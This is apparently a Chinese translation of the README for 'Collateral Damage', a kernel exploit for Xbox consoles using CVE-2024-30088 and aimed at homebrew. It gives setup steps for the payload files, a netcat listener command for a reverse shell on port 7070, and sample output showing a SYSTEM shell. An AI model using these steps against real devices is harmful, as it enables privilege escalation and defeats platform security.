利用 CVE-2024-30088 攻击 Xbox SystemOS 内核

附带损害

Collateral Damage 是针对 Xbox SystemOS 的一个内核漏洞，利用了CVE-2024-30088。该漏洞针对的是运行内核版本 25398.4478、25398.4908 和 25398.4909 的 Xbox One 和 Xbox Series 主机。初始入口点是通过 Game Script UWP 应用程序。

该漏洞由Emma Kirkpatrick（漏洞发现与利用）和Lander Brandt（PE 加载器开发）开发

重要警告

此初始版本主要面向开发人员。目前LocalState需要通过Adv File Explorer (FullTrust)等应用程序将文件放入游戏脚本目录中。这是因为需要将 stage2.bin 和run.exe 文件放入LocalState目录中。在不久的将来，将提供一个有效载荷，通过网络加载这些文件，因此初始有效载荷将只是一个可以通过 USB 键盘模拟器输入的脚本。

此处提供的反向 shell 示例要求您的主机连接到网络。将主机连接到网络时，请务必小心，避免连接到互联网并进行更新。尽量阻止与 Xbox LIVE 的连接，至少通过将 DNS 设置为无效服务器来阻止连接。

此漏洞并非完全可靠。它依赖于 CPU 侧通道以及竞争条件，这两者都有可能失败。如果发生故障，漏洞可能会通过网络输出提醒您它已失败，或者控制台本身可能会崩溃并重新启动。

用法

• 修改第 7 行以gamescript_autosave.txt包含您 PC 的本地 IP。

• 将gamescript_autosave.txt、stage2.bin和复制到控制台上的游戏脚本应用程序目录run.exe( )LocalStateQ:UsersUserMgr0AppDataLocalPackages27878ConstantineTarasenko.458004FD2C47C_c8b3w9r5va522LocalState

• 使用 netcat 或类似工具监听电脑上的 7070 端口（命令示例nc64.exe -lvnp 7070）

• 在控制台上打开游戏脚本应用程序并选择“显示代码运行窗口”，然后单击“运行代码一次”

• 如果漏洞利用成功，你应该在你的电脑上看到类似以下内容的输出：

listening on [any] 7070 ...connect to [192.168.0.61] from (UNKNOWN) [192.168.0.130] 49665Collateral Damage - @carrot_c4k3 & @landaire (exploits.forsale)Build number: 25398.4478Attempting to find kernel base...Found likely kernel base: FFFFF80AF9800000Attempting exploit...Exploit succeeded! Running payload!Microsoft Windows [Version 10.0.25398.4478]Copyright (c) Microsoft Corporation. All rights reserved.S:>

实验

需要进行大量额外的工作才能使其成为将自制软件加载到 Xbox 上的用户友好工具，但我希望这能提供一个良好的起点：) 如果您想以 SYSTEM 身份运行代码，您可以将代码放在函数 post_exploit 中 post_exploit.c。

进一步的工作

还有很多事情要做，但是随着内核部分的完成，我想与社区分享它，以便开发人员可以开始研究 SYSTEM 权限。以下是我希望在未来添加的一些内容：

• 侧载支持

• 未签名的非 UWP 进程启动

• SSH 支持

https://github.com/exploits-forsale/collateral-damage